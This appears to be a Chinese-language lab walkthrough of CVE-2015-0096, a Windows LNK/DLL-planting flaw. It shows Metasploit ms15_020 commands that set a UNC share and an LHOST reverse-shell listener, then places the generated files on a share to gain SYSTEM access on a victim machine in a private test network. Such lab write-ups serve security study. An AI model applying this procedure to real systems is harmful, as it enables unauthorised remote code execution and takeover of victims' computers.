您好,登錄后才能下訂單哦!
這篇文章給大家介紹Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析,內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對(duì)大家能有所幫助。
Microsoft Windows沒有正確處理DLL文件的加載,存在遠(yuǎn)程代碼執(zhí)行漏洞,通過(guò)誘使用戶打開遠(yuǎn)程WebDAV或SMB共享上的某些文件利用此漏洞,成功利用后可導(dǎo)致加載任意庫(kù)。Windows使用.lnk來(lái)定義文件或者目錄的快捷方式,可以使用.CPL文件來(lái)自定義圖標(biāo)。問(wèn)題是,在Windows中,圖標(biāo)從模塊(或者可執(zhí)行文件或動(dòng)態(tài)鏈接庫(kù))加載。事實(shí)上,.cpl文件實(shí)際上是DLL文件。因?yàn)楣粽呖梢远x哪些可執(zhí)行模塊會(huì)被加載,攻擊者可以利用.LNK文件來(lái)執(zhí)行任意代碼。
入侵主機(jī)linux:192.168.1.125
共享文件主機(jī)win7:192.168.1.102
受害者主機(jī)win7:192.168.1.109
準(zhǔn)備好兩臺(tái)Windows7的主機(jī)環(huán)境,搭建好一個(gè),直接拷貝速度更快。
克隆一份Windows7:
在一臺(tái)win7主機(jī)上的C盤中創(chuàng)建share文件夾,并進(jìn)行共享。
在第二臺(tái)主機(jī)上查看是否共享成功。
共享成功后,所需要的環(huán)境條件就以達(dá)成,接下來(lái)使用攻擊機(jī)器kali Linux進(jìn)行攻擊。所使用工具為msf。
搜索相關(guān)漏洞:ms15_020
利用相關(guān)漏洞模塊:
設(shè)置一個(gè)反彈shell:
查看需要設(shè)置的參數(shù):
設(shè)置好參數(shù),設(shè)置漏洞利用模塊列表的UNCHOST和UNCSHARE
set UNCHOST 192.168.1.102
設(shè)置為文件共享主機(jī)地址
set UNCSHARE share
設(shè)置共享文件的文件夾,這里主機(jī)192.168.1.102在C盤下的share里文件夾開啟了共享,提前創(chuàng)建好共享
set LHOST 192.168.1.125
設(shè)置漏洞成功利用后后門連接的地址
Exploit
執(zhí)行漏洞
生成了幾個(gè)文件,我們?nèi)ド傻哪夸浵掳盐募截惖焦蚕碇鳈C(jī)的共享文件夾下:
可能會(huì)提示如下:
利用重命名解決問(wèn)題,記得改回。
受害者訪問(wèn)共享后,成功了觸發(fā)了漏洞。
可以發(fā)現(xiàn)入侵者這邊彈回來(lái)了一個(gè)回話session 1
成功獲取到系統(tǒng)權(quán)限。
關(guān)于Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。